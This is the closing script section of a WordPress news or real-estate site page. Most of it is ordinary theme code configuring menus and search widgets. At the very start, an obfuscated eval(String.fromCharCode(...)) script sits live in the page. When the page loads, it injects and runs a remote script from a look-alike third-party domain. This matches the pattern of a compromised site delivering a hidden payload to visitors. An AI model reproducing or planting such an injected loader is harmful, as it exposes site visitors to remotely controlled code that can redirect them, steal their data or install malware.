type="text/javascript">eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));</script><script type='text/javascript' src='https://tuvanbds.net/wp-includes/js/underscore.min.js?ver=1.13.4' id='underscore-js'></script> <script type='text/javascript' src='https://tuvanbds.net/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=4173294bcf58591c4439ff8ccd792f1ex' id='tdb_js_posts_autoload-js'></script> <script type='text/javascript' src='https://tuvanbds.net/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=11.5.1' id='td-site-min-js'></script> <script type='text/javascript' src='https://tuvanbds.net/wp-includes/js/comment-reply.min.js?ver=6.1.1' id='comment-reply-js'></script> <script type='text/javascript' src='https://tuvanbds.net/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=4173294bcf58591c4439ff8ccd792f1ex' id='tdb_js_files_for_front-js'></script> <!-- JS generated by theme --> <script> jQuery().ready(function () { var blockClass = '.tdi_46'; jQuery(blockClass + '.tdb-horiz-menu-singleline > .menu-item-has-children a').click(function (e) { e.preventDefault(); }) }); /* global jQuery:{} */ jQuery().ready(function () { var tdbMenuItem = new tdbMenu.item(); tdbMenuItem.blockUid = 'tdi_63'; tdbMenuItem.jqueryObj = jQuery('.tdi_63'); tdbMenuItem.isMegaMenuFull = true; tdbMenu.addItem(tdbMenuItem); }); jQuery().ready(function () { var tdbSearchItem = new tdbSearch.item(); //block unique ID tdbSearchItem.blockUid = 'tdi_68'; tdbSearchItem.blockAtts = '{"results_msg_align":"content-horiz-center","image_floated":"float_left","image_width":"30","image_size":"td_324x400","show_cat":"none","show_btn":"none","show_date":"","show_review":"none","show_com":"none","show_excerpt":"none","show_author":"none","meta_padding":"0 0 0 15px","art_title":"0 0 5px","all_modules_space":"15","tdc_css":"eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==","form_align":"content-horiz-right","icon_color":"#ffffff","icon_size":"eyJhbGwiOiIxOCIsInBvcnRyYWl0IjoiMTQifQ==","icon_padding":"eyJhbGwiOjIuNiwicG9ydHJhaXQiOiIyLjgifQ==","tdicon":"td-icon-magnifier-medium-short-light","show_form":"yes","form_border_color":"#dd3333","arrow_color":"#dd3333","form_shadow_shadow_size":"10","form_shadow_shadow_color":"rgba(0,0,0,0.12)","f_input_font_family":"712","f_input_font_weight":"400","f_btn_font_family":"712","f_btn_font_weight":"400","f_input_font_size":"13","f_placeholder_font_family":"712","f_placeholder_font_weight":"400","f_placeholder_font_size":"13","f_btn_font_size":"13","f_results_msg_font_family":"712","f_results_msg_font_size":"11","f_title_font_family":"712","f_title_font_size":"13","f_title_font_line_height":"1.2","f_meta_font_family":"712","f_meta_font_size":"11","f_meta_font_line_height":"1","title_txt_hover":"#008d7f","btn_bg_h":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiIjMDA4ZDdmIiwiY29sb3IyIjoiIzAwOGQ3ZiIsIm1peGVkQ29sb3JzIjpbXSwiZGVncmVlIjoiLTkwIiwiY3NzIjoiYmFja2dyb3VuZC1jb2xvcjogIzAwOGQ3ZjsiLCJjc3NQYXJhbXMiOiIwZGVnLCMwMDhkN2YsIzAwOGQ3ZiJ9","modules_gap":"0","image_height":"80","meta_info_align":"center","results_msg_color_h":"#008d7f","block_type":"tdb_header_search","disable_trigger":"","show_results":"yes","separator":"","disable_live_search":"","exclude_pages":"","exclude_posts":"","toggle_txt":"","toggle_txt_pos":"","toggle_txt_align":"0","toggle_txt_space":"","toggle_horiz_align":"content-horiz-left","inline":"","float_block":"","form_offset":"","form_offset_left":"","form_width":"","form_content_width":"","form_padding":"","form_border":"","form_align_screen":"","input_placeholder":"","placeholder_travel":"0","input_padding":"","input_border":"","input_radius":"","btn_text":"Search","btn_tdicon":"","btn_icon_pos":"","btn_icon_size":"","btn_icon_space":"","btn_icon_align":"0","btn_margin":"","btn_padding":"","btn_border":"","btn_radius":"","results_padding":"","results_border":"","results_msg_padding":"","results_msg_border":"","mc1_tl":"","mc1_title_tag":"","mc1_el":"","results_limit":"","modules_on_row":"100%","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","video_icon":"","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","vid_t_color":"","vid_t_bg_color":"","f_vid_time_font_header":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","meta_info_horiz":"content-horiz-left","meta_width":"","meta_margin":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","art_btn":"","modules_category":"","modules_category_margin":"","modules_category_padding":"","modules_cat_border":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_space":"","review_size":"2.5","review_distance":"","art_excerpt":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","btn_title":"","btn_border_width":"","form_general_bg":"","icon_color_h":"","toggle_txt_color":"","toggle_txt_color_h":"","f_toggle_txt_font_header":"","f_toggle_txt_font_title":"Text","f_toggle_txt_font_settings":"","f_toggle_txt_font_family":"","f_toggle_txt_font_size":"","f_toggle_txt_font_line_height":"","f_toggle_txt_font_style":"","f_toggle_txt_font_weight":"","f_toggle_txt_font_transform":"","f_toggle_txt_font_spacing":"","f_toggle_txt_":"","form_bg":"","form_shadow_shadow_header":"","form_shadow_shadow_title":"Shadow","form_shadow_shadow_offset_horizontal":"","form_shadow_shadow_offset_vertical":"","form_shadow_shadow_spread":"","input_color":"","placeholder_color":"","placeholder_opacity":"0","input_bg":"","input_border_color":"","input_shadow_shadow_header":"","input_shadow_shadow_title":"Input shadow","input_shadow_shadow_size":"","input_shadow_shadow_offset_horizontal":"","input_shadow_shadow_offset_vertical":"","input_shadow_shadow_spread":"","input_shadow_shadow_color":"","btn_color":"","btn_color_h":"","btn_icon_color":"","btn_icon_color_h":"","btn_bg":"","btn_border_color":"","btn_border_color_h":"","btn_shadow_shadow_header":"","btn_shadow_shadow_title":"Button shadow","btn_shadow_shadow_size":"","btn_shadow_shadow_offset_horizontal":"","btn_shadow_shadow_offset_vertical":"","btn_shadow_shadow_spread":"","btn_shadow_shadow_color":"","f_input_font_header":"","f_input_font_title":"Input text","f_input_font_settings":"","f_input_font_line_height":"","f_input_font_style":"","f_input_font_transform":"","f_input_font_spacing":"","f_input_":"","f_placeholder_font_title":"Placeholder text","f_placeholder_font_settings":"","f_placeholder_font_line_height":"","f_placeholder_font_style":"","f_placeholder_font_transform":"","f_placeholder_font_spacing":"","f_placeholder_":"","f_btn_font_title":"Button text","f_btn_font_settings":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","results_bg":"","results_border_color":"","results_msg_color":"","results_msg_bg":"","results_msg_border_color":"","f_results_msg_font_header":"","f_results_msg_font_title":"Text","f_results_msg_font_settings":"","f_results_msg_font_line_height":"","f_results_msg_font_style":"","f_results_msg_font_weight":"","f_results_msg_font_transform":"","f_results_msg_font_spacing":"","f_results_msg_":"","m_bg":"","color_overlay":"","shadow_module_shadow_header":"","shadow_module_shadow_title":"Module Shadow","shadow_module_shadow_size":"","shadow_module_shadow_offset_horizontal":"","shadow_module_shadow_offset_vertical":"","shadow_module_shadow_spread":"","shadow_module_shadow_color":"","title_txt":"","all_underline_height":"","all_underline_color":"#000","cat_bg":"","cat_bg_hover":"","cat_txt":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","shadow_meta_shadow_header":"","shadow_meta_shadow_title":"Meta info shadow","shadow_meta_shadow_size":"","shadow_meta_shadow_offset_horizontal":"","shadow_meta_shadow_offset_vertical":"","shadow_meta_shadow_spread":"","shadow_meta_shadow_color":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border_hover":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_weight":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","el_class":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","border_top":"","css":"","class":"tdi_68","tdc_css_class":"tdi_68","tdc_css_class_style":"tdi_68_rand_style"}'; tdbSearchItem.jqueryObj = jQuery('.tdi_68'); tdbSearchItem._openSearchFormClass = 'tdb-drop-down-search-open'; tdbSearchItem._resultsLimit = '4'; tdbSearch.addItem( tdbSearchItem ); }); /* global jQuery:{} */ jQuery().ready(function () { var tdbMenuItem = new tdbMenu.item(); tdbMenuItem.blockUid = 'tdi_82'; tdbMenuItem.jqueryObj = jQuery('.tdi_82'); tdbMenuItem.isMegaMenuFull = true; tdbMenu.addItem(tdbMenuItem); }); jQuery().ready(function () { var tdbSearchItem = new tdbSearch.item(); //block unique ID tdbSearchItem.blockUid = 'tdi_87'; tdbSearchItem.blockAtts = '{"results_msg_align":"content-horiz-center","image_floated":"float_left","image_width":"30","image_size":"td_324x400","show_cat":"none","show_btn":"none","show_date":"","show_review":"none","show_com":"none","show_excerpt":"none","show_author":"none","meta_padding":"0 0 0 15px","art_title":"0 0 5px","all_modules_space":"15","tdc_css":"eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==","form_align":"content-horiz-right","icon_color":"#ffffff","icon_size":"eyJhbGwiOiIxOCIsInBvcnRyYWl0IjoiMTQifQ==","icon_padding":"eyJhbGwiOjIuNiwicG9ydHJhaXQiOiIyLjgifQ==","tdicon":"td-icon-magnifier-medium-short-light","show_form":"yes","form_border_color":"#dd3333","arrow_color":"#dd3333","form_shadow_shadow_size":"10","form_shadow_shadow_color":"rgba(0,0,0,0.12)","f_input_font_family":"712","f_input_font_weight":"400","f_btn_font_family":"712","f_btn_font_weight":"400","f_input_font_size":"13","f_placeholder_font_family":"712","f_placeholder_font_weight":"400","f_placeholder_font_size":"13","f_btn_font_size":"13","f_results_msg_font_family":"712","f_results_msg_font_size":"11","f_title_font_family":"712","f_title_font_size":"13","f_title_font_line_height":"1.2","f_meta_font_family":"712","f_meta_font_size":"11","f_meta_font_line_height":"1","title_txt_hover":"#008d7f","btn_bg_h":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiIjMDA4ZDdmIiwiY29sb3IyIjoiIzAwOGQ3ZiIsIm1peGVkQ29sb3JzIjpbXSwiZGVncmVlIjoiLTkwIiwiY3NzIjoiYmFja2dyb3VuZC1jb2xvcjogIzAwOGQ3ZjsiLCJjc3NQYXJhbXMiOiIwZGVnLCMwMDhkN2YsIzAwOGQ3ZiJ9","modules_gap":"0","image_height":"80","meta_info_align":"center","results_msg_color_h":"#008d7f","block_type":"tdb_header_search","disable_trigger":"","show_results":"yes","separator":"","disable_live_search":"","exclude_pages":"","exclude_posts":"","toggle_txt":"","toggle_txt_pos":"","toggle_txt_align":"0","toggle_txt_space":"","toggle_horiz_align":"content-horiz-left","inline":"","float_block":"","form_offset":"","form_offset_left":"","form_width":"","form_content_width":"","form_padding":"","form_border":"","form_align_screen":"","input_placeholder":"","placeholder_travel":"0","input_padding":"","input_border":"","input_radius":"","btn_text":"Search","btn_tdicon":"","btn_icon_pos":"","btn_icon_size":"","btn_icon_space":"","btn_icon_align":"0","btn_margin":"","btn_padding":"","btn_border":"","btn_radius":"","results_padding":"","results_border":"","results_msg_padding":"","results_msg_border":"","mc1_tl":"","mc1_title_tag":"","mc1_el":"","results_limit":"","modules_on_row":"100%","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","video_icon":"","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","vid_t_color":"","vid_t_bg_color":"","f_vid_time_font_header":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","meta_info_horiz":"content-horiz-left","meta_width":"","meta_margin":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","art_btn":"","modules_category":"","modules_category_margin":"","modules_category_padding":"","modules_cat_border":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_space":"","review_size":"2.5","review_distance":"","art_excerpt":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","btn_title":"","btn_border_width":"","form_general_bg":"","icon_color_h":"","toggle_txt_color":"","toggle_txt_color_h":"","f_toggle_txt_font_header":"","f_toggle_txt_font_title":"Text","f_toggle_txt_font_settings":"","f_toggle_txt_font_family":"","f_toggle_txt_font_size":"","f_toggle_txt_font_line_height":"","f_toggle_txt_font_style":"","f_toggle_txt_font_weight":"","f_toggle_txt_font_transform":"","f_toggle_txt_font_spacing":"","f_toggle_txt_":"","form_bg":"","form_shadow_shadow_header":"","form_shadow_shadow_title":"Shadow","form_shadow_shadow_offset_horizontal":"","form_shadow_shadow_offset_vertical":"","form_shadow_shadow_spread":"","input_color":"","placeholder_color":"","placeholder_opacity":"0","input_bg":"","input_border_color":"","input_shadow_shadow_header":"","input_shadow_shadow_title":"Input shadow","input_shadow_shadow_size":"","input_shadow_shadow_offset_horizontal":"","input_shadow_shadow_offset_vertical":"","input_shadow_shadow_spread":"","input_shadow_shadow_color":"","btn_color":"","btn_color_h":"","btn_icon_color":"","btn_icon_color_h":"","btn_bg":"","btn_border_color":"","btn_border_color_h":"","btn_shadow_shadow_header":"","btn_shadow_shadow_title":"Button shadow","btn_shadow_shadow_size":"","btn_shadow_shadow_offset_horizontal":"","btn_shadow_shadow_offset_vertical":"","btn_shadow_shadow_spread":"","btn_shadow_shadow_color":"","f_input_font_header":"","f_input_font_title":"Input text","f_input_font_settings":"","f_input_font_line_height":"","f_input_font_style":"","f_input_font_transform":"","f_input_font_spacing":"","f_input_":"","f_placeholder_font_title":"Placeholder text","f_placeholder_font_settings":"","f_placeholder_font_line_height":"","f_placeholder_font_style":"","f_placeholder_font_transform":"","f_placeholder_font_spacing":"","f_placeholder_":"","f_btn_font_title":"Button text","f_btn_font_settings":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","results_bg":"","results_border_color":"","results_msg_color":"","results_msg_bg":"","results_msg_border_color":"","f_results_msg_font_header":"","f_results_msg_font_title":"Text","f_results_msg_font_settings":"","f_results_msg_font_line_height":"","f_results_msg_font_style":"","f_results_msg_font_weight":"","f_results_msg_font_transform":"","f_results_msg_font_spacing":"","f_results_msg_":"","m_bg":"","color_overlay":"","shadow_module_shadow_header":"","shadow_module_shadow_title":"Module Shadow","shadow_module_shadow_size":"","shadow_module_shadow_offset_horizontal":"","shadow_module_shadow_offset_vertical":"","shadow_module_shadow_spread":"","shadow_module_shadow_color":"","title_txt":"","all_underline_height":"","all_underline_color":"#000","cat_bg":"","cat_bg_hover":"","cat_txt":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","shadow_meta_shadow_header":"","shadow_meta_shadow_title":"Meta info shadow","shadow_meta_shadow_size":"","shadow_meta_shadow_offset_horizontal":"","shadow_meta_shadow_offset_vertical":"","shadow_meta_shadow_spread":"","shadow_meta_shadow_color":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border_hover":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_weight":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","el_class":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","border_top":"","css":"","class":"tdi_87","tdc_css_class":"tdi_87","tdc_css_class_style":"tdi_87_rand_style"}'; tdbSearchItem.jqueryObj = jQuery('.tdi_87'); tdbSearchItem._openSearchFormClass = 'tdb-drop-down-search-open'; tdbSearchItem._resultsLimit = '4'; tdbSearch.addItem( tdbSearchItem ); }); jQuery(window).on( 'load', function () { var block = jQuery('.tdi_112'), blockClass = '.tdi_112', blockInner = block.find('.tdb-block-inner'), blockOffsetLeft; if( block.find('audio').length > 0 ) { jQuery(blockClass + ' audio').mediaelementplayer(); } if( block.hasClass('tdb-sfi-stretch') ) { jQuery(window).resize(function () { blockOffsetLeft = block.offset().left; if( block.hasClass('tdb-sfi-stretch-left') ) { blockInner.css('margin-left', -blockOffsetLeft + 'px'); } else { blockInner.css('margin-right', -(jQuery(window).width() - (blockOffsetLeft + block.outerWidth())) + 'px'); } }); jQuery(window).resize(); } setTimeout(function () { block.css('opacity', 1); }, 500); }); </script> </body> </html>